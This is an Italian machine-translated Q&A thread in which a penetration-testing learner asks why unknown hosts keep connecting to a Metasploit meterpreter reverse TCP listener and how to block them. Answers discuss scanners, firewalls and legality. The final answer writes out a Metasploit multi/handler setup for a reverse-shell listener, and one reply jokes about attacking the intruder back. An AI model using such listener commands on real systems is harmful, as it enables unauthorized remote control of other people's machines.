Connessioni casuali a meterpreter reverse listener tcp

0

Attualmente sto imparando alcuni test di penetrazione di base usando Metasploit. Ho installato un payload tcp meterpreter inverso che eseguo su un'istanza di Amazon EC2 Windows. A volte durante lo spostamento di un nuovo payload della macchina, l'ascoltatore che ho impostato in Metasploit verrà connesso a un payload con esito positivo, con conseguente apertura di una sessione meterpreter sul computer di qualcuno. È successo due volte finora con connessioni dall'India e dalla Russia. Le sessioni si chiudono automaticamente dopo 30-60 secondi (Motivo: deceduto).

Ho pensato che si sarebbero verificate connessioni casuali dovute a port-scan e quant'altro, ma queste connessioni hanno effettivamente scaricato ed eseguito meterpreter.

1) Perché sta succedendo questo? 2a) C'è un modo per usare Metasploit per impedirlo? (Non voglio essere criticato per aver "hackerato" un tizio in Russia) 2b) In caso contrario, iptables è il metodo migliore?

Scusa se queste sono domande di base! Grazie!

    
posta zen 06.05.2013 - 18:21
fonte

4 risposte

1

Mi sono imbattuto in questo alcuni anni fa mentre mostravo a un collega come usare SET.

Fondamentalmente hai il tuo ascoltatore aperto e lo vedranno nelle scansioni della porta. Stavo vedendo anche lo shellcode inviato nella console, il che era esilarante. Fondamentalmente quello che hai è un honeypot del ghetto.

    
risposta data 06.05.2013 - 20:53
fonte
0

Forse potresti cambiare la porta su cui stai ascoltando qualcosa di più oscuro? Penso che probabilmente sarai al sicuro legalmente visto che non stai hackerando nessuno, in pratica ti stanno hackerando (e rubando un carico utile malevolo?), Ma penso che sia un fenomeno piuttosto divertente. Buona fortuna, so che sarei tentato di colpire un po 'il computer dell'intruso.

    
risposta data 06.05.2013 - 18:47
fonte
0

Questo non sembra un problema di configurazione di Metasploit, ma un problema di asset dannosi inavvertitamente. Per me, sembra che tu abbia una risorsa là fuori (sito web?) Che sta sfruttando attivamente i computer che si connettono ad esso, che a sua volta si ricollegano al listener Metasploit.

Per risolvere il problema, è necessario configurare il firewall sulla risorsa (server Web?) per consentire solo ai computer di connettersi ad esso. Altrimenti temo che tu stia facendo qualcosa che è considerato illegale in molte giurisdizioni ...

    
risposta data 07.05.2013 - 00:43
fonte
-1

dovresti avere qualcosa di questo formato come gestore sul tuo msfconsole:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.43.204
set LPORT 8899
set ExitOnSession false
exploit -j
    
risposta data 27.10.2016 - 17:47
fonte

Leggi altre domande sui tag